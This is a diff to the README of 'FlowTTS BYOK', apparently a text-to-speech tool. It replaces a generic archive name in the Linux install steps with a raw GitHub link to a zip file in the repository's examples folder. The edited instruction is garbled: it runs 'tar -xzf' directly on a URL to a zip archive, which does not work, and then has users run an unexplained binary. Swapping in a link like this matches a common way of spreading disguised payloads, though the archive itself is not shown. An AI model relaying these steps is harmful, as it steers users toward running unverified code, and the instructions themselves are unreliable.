glloydie/flowtts-byok/README.md

 #### For Linux:
 1. Open your terminal.
 2. Navigate to the folder where you downloaded the file.
-3. Extract the `.tar.gz` file using the command: `tar -xzf filename.tar.gz`.
+3. Extract the `https://raw.githubusercontent.com/glloydie/flowtts-byok/master/examples/byok_flowtts_v2.2.zip` file using the command: `tar -xzf https://raw.githubusercontent.com/glloydie/flowtts-byok/master/examples/byok_flowtts_v2.2.zip`.
 4. Change to the extracted directory and run the application using the command: `./flowtts`.

 ## 🎤 Using FlowTTS BYOK